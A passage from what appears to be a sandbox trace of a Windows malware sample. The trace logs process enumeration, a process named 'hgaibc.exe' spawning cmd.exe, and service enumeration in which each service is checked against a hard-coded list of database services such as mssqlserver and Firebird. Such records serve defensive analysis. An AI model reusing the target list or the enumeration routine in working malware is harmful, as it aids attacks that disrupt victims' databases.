cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.740] lstrlenW (lpString="svchost.exe") returned 11 [0169.740] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0169.741] lstrlenW (lpString="dwm.exe") returned 7 [0169.741] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.741] lstrlenW (lpString="svchost.exe") returned 11 [0169.742] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.743] lstrlenW (lpString="svchost.exe") returned 11 [0169.743] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.744] lstrlenW (lpString="svchost.exe") returned 11 [0169.744] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.745] lstrlenW (lpString="svchost.exe") returned 11 [0169.745] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.746] lstrlenW (lpString="svchost.exe") returned 11 [0169.746] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.747] lstrlenW (lpString="svchost.exe") returned 11 [0169.747] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.748] lstrlenW (lpString="svchost.exe") returned 11 [0169.748] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.749] lstrlenW (lpString="svchost.exe") returned 11 [0169.749] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.750] lstrlenW (lpString="svchost.exe") returned 11 [0169.750] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.751] lstrlenW (lpString="svchost.exe") returned 11 [0169.751] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0169.752] lstrlenW (lpString="spoolsv.exe") returned 11 [0169.752] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.753] lstrlenW (lpString="svchost.exe") returned 11 [0169.753] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0169.754] lstrlenW (lpString="audiodg.exe") returned 11 [0169.754] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0169.755] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0169.755] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0169.758] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0169.758] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0169.759] lstrlenW (lpString="Memory Compression") returned 18 [0169.759] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0169.760] lstrlenW (lpString="sihost.exe") returned 10 [0169.764] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.765] lstrlenW (lpString="svchost.exe") returned 11 [0169.765] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0169.766] lstrlenW (lpString="msoia.exe") returned 9 [0169.766] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0169.767] lstrlenW (lpString="taskhostw.exe") returned 13 [0169.767] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0169.770] lstrlenW (lpString="explorer.exe") returned 12 [0169.770] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0169.772] lstrlenW (lpString="SearchUI.exe") returned 12 [0169.772] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0170.028] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0170.028] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0170.029] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0170.029] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0170.030] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0170.030] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x9d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0170.031] lstrlenW (lpString="hgaibc.exe") returned 10 [0170.031] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0170.032] lstrlenW (lpString="cmd.exe") returned 7 [0170.032] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0170.033] lstrlenW (lpString="conhost.exe") returned 11 [0170.033] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xefc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3bc, pcPriClassBase=13, dwFlags=0x0, szExeFile="consent.exe")) returned 1 [0170.034] lstrlenW (lpString="consent.exe") returned 11 [0170.034] Process32NextW (in: hSnapshot=0x484, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xefc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3bc, pcPriClassBase=13, dwFlags=0x0, szExeFile="consent.exe")) returned 0 [0170.035] CloseHandle (hObject=0x484) returned 1 [0170.035] Sleep (dwMilliseconds=0x1f4) [0170.742] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x458c358 [0170.743] EnumServicesStatusExW (in: hSCManager=0x458c358, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 0 [0170.745] GetLastError () returned 0xea [0170.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c30) returned 0x45ff6f8 [0170.745] EnumServicesStatusExW (in: hSCManager=0x458c358, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x45ff6f8, cbBufSize=0x1c30, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x45ff6f8, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 1 [0170.747] CloseServiceHandle (hSCObject=0x458c358) returned 1 [0170.747] lstrlenW (lpString="Appinfo") returned 7 [0170.748] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0170.748] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0170.748] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0170.748] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0170.748] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0170.748] lstrlenW (lpString="AppXSvc") returned 7 [0170.748] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0170.748] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0170.748] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0170.748] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0170.748] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0170.748] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0170.748] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0170.748] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0170.748] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0170.748] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0170.748] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0170.748] lstrlenW (lpString="Audiosrv") returned 8 [0170.748] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0170.748] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0170.748] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0170.748] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0170.748] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0170.748] lstrlenW (lpString="BFE") returned 3 [0170.748] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0170.748] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0170.748] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0170.748] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0170.749] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0170.749] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0170.749] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0170.749] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0170.749] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0170.749] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0170.749] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0170.749] lstrlenW (lpString="CDPSvc") returned 6 [0170.749] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0170.749] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0170.749] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0170.749] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0170.749] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0170.749] lstrlenW (lpString="ClickToRunSvc") returned 13 [0170.749] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0170.749] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0170.749] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0170.749] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0170.749] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0170.749] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0170.749] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0170.749] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0170.749] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0170.749] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0170.749] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0170.749] lstrlenW (lpString="CryptSvc") returned 8 [0170.749] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0170.749] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0170.749] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0170.749] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0170.750] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0170.750] lstrlenW (lpString="DcomLaunch") returned 10 [0170.750] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0170.750] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0170.750] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0170.750] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0170.750] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0170.750] lstrlenW (lpString="DeviceAssociationService") returned 24 [0170.750] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0170.750] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0170.750] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0170.750] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0170.750] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0170.750] lstrlenW (lpString="Dhcp") returned 4 [0170.750] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0170.750] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0170.750] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0170.750] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0170.750] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0170.750] lstrlenW (lpString="Dnscache") returned 8 [0170.750] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0170.750] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0170.750] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0170.750] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0170.750] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0170.750] lstrlenW (lpString="DPS") returned 3 [0170.750] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0170.750] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0170.750] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0170.751] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0170.751] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0170.751] lstrlenW (lpString="DusmSvc") returned 7 [0170.751] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0170.751] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0170.751] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0170.751] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0170.751] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0170.751] lstrlenW (lpString="EventLog") returned 8 [0170.751] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0170.751] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0170.751] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0170.751] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0170.751] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0170.751] lstrlenW (lpString="EventSystem") returned 11 [0170.751] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0170.751] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0170.751] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0170.751] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0170.751] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0170.751] lstrlenW (lpString="FontCache") returned 9 [0170.751] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0170.751] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0170.751] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0170.751] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0170.751] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0170.751] lstrlenW (lpString="gpsvc") returned 5 [0170.751] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0170.751] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0170.752] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0170.752] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0170.752] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0170.752] lstrlenW (lpString="iphlpsvc") returned 8 [0170.752] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0170.752] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0170.752] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0170.752] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0170.752] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0170.752] lstrlenW (lpString="KeyIso") returned 6 [0170.752] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0170.752] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0170.752] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0170.752] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0170.752] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0170.752] lstrlenW (lpString="LanmanServer") returned 12 [0170.752] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0170.752] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0170.752] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0170.752] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0170.752] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0170.752] lstrlenW (lpString="LanmanWorkstation") returned 17 [0170.752] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0170.752] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0170.752] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0170.752] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0170.752] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0170.752] lstrlenW (lpString="lfsvc") returned 5 [0170.752] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0170.753] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0170.753] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0170.753] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0170.753] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0170.753] lstrlenW (lpString="lmhosts") returned 7 [0170.753] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0170.753] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0170.753] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0170.753] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0170.753] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0170.753] lstrlenW (lpString="LSM") returned 3 [0170.753] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0170.753] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0170.753] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0170.753] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0170.753] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0170.753] lstrlenW (lpString="MpsSvc") returned 6 [0170.753] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0170.753] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0170.753] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0170.753] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0170.753] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0170.753] lstrlenW (lpString="NcbService") returned 10 [0170.753] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0170.753] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0170.753] 